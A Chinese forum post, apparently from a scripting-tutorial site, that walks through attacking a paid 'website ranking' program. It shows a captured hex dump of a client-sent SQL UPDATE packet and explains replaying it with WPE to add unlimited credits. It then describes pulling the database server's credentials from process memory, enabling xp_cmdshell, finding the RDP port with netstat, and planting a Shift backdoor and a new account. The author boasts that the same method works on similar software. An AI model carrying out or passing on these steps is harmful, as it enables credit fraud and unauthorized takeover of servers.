欢迎来到 嗅灵易学

零基础也能上手的脚本技术课,一对一答疑带你入门

[原创]抓了一个数据包拿下一台服务器

[原创]抓了一个数据包拿下一台服务器

下载了一个《网站排名某某程序》,程序需要.NET2.0 C#开发,加了Xenocode,程序卡的要死要死的。
官方网站:http://3w.paiminger..com/download/
写在前面:调试发现程序加了木马远程控制功能[请虚拟机测试]
软件盈利方式:充值积分
打开minisniffer后再打开软件,发现如下数据包
很明显,sql server连接数据包,抓取一条数据包用WPE修改一下连续发包直接刷积分。


举例数据包[刷积分增加2.4]:

31  192.168.6.130:1600  117.21.191.171:6486  320  WSA发送  
0000  03 09 01 40 00 00 01 00 16 00 00 00 12 00 00 00    ...@............
0010  02 00 00 00 00 00 00 00 00 00 01 00 00 00 FF FF    ................
0020  0A 00 02 00 00 00 E7 BC 00 04 08 D0 00 00 BC 00    ................
0030  55 00 50 00 44 00 41 00 54 00 45 00 20 00 64 00    U.P.D.A.T.E. .d.
0040  69 00 61 00 6E 00 5F 00 75 00 73 00 65 00 72 00    i.a.n._.u.s.e.r.
0050  20 00 53 00 45 00 54 00 20 00 6A 00 69 00 66 00     .S.E.T. .j.i.f.
0060  65 00 6E 00 20 00 3D 00 20 00 6A 00 69 00 66 00    e.n. .=. .j.i.f.
0070  65 00 6E 00 2B 00 32 00 2E 00 34 00 2C 00 6A 00    e.n.+.2...4.,.j.
0080  69 00 65 00 73 00 75 00 6D 00 3D 00 6A 00 69 00    i.e.s.u.m.=.j.i.
0090  65 00 73 00 75 00 6D 00 2B 00 32 00 2E 00 34 00    e.s.u.m.+.2...4.
00A0  2C 00 7A 00 6F 00 6E 00 67 00 64 00 6A 00 3D 00    ,.z.o.n.g.d.j.=.
00B0  7A 00 6F 00 6E 00 67 00 64 00 6A 00 2B 00 32 00    z.o.n.g.d.j.+.2.
00C0  2E 00 34 00 20 00 20 00 57 00 48 00 45 00 52 00    ..4. . .W.H.E.R.
00D0  45 00 20 00 6E 00 61 00 6D 00 65 00 20 00 3D 00    E. .n.a.m.e. .=.
00E0  20 00 40 00 6E 00 61 00 6D 00 65 00 00 00 E7 22     .@.n.a.m.e...."
00F0  00 04 08 D0 00 00 22 00 40 00 6E 00 61 00 6D 00    ......".@.n.a.m.
0100  65 00 20 00 6E 00 76 00 61 00 72 00 63 00 68 00    e. .n.v.a.r.c.h.
0110  61 00 72 00 28 00 38 00 29 00 05 40 00 6E 00 61    a.r.(.8.)..@.n.a
0120  00 6D 00 65 00 00 E7 10 00 04 08 D0 00 00 10 00    .m.e............
0130  -- 00 -- 00 -- 00 -- 00 -- 00 -- 00 -- 00 -- 00    -.-.-.-.-.-.-.-.   // your user

得出Send结构体
struct _SEND_
{
    WORD wBZ;   //标识位
    WORD wSize; //数据包大小,正序
    ........
    wchar_t wcsBuffer[];  //UNICODE编码 SQL语句
}

直接修改2.4为你想要的数字发送就修改了,想刷多少钱刷多少钱的积分。

//--------------------------------------------------------------------------------------
单单刷积分使用软件还不够好玩,不如直接练练手拿下服务器。
1.搜索C#怎么开发MSSQL,使用CE内存搜索到服务器、账号密码、数据库。

2.使用SQLTools连接服务器,启用xp_cmdshell功能,开启DOS命令。

[


所有备份都在这了,别乱动哦。
3.看一下服务器数据裤


4.找出3389服务真正的端口    netstat -abn>netstat.txt &  type netstat.txt

5.添加shift后门,添加账号,登入服务器。
现在的软件开发人员真的太菜了。。。。。。类似的程序编写方式,通杀。

上传的附件 3389.png
code.png
db1.png
db2.jpg
dos.png
dos1.jpg
dos3.jpg
gai.png
gai2.png
web.png

注意:上传附件及图片大小不得大于30M。

⚠️ 版权声明:
本博客所有内容(含教程、源码、工具)仅供个人技术学习与研究交流使用,严禁商用、倒卖、二次分发及非法用途。
未经作者书面授权,任何组织或个人不得转载、复制或用于其他平台,违者将追究相关责任。

0 0 0 举报
复制成功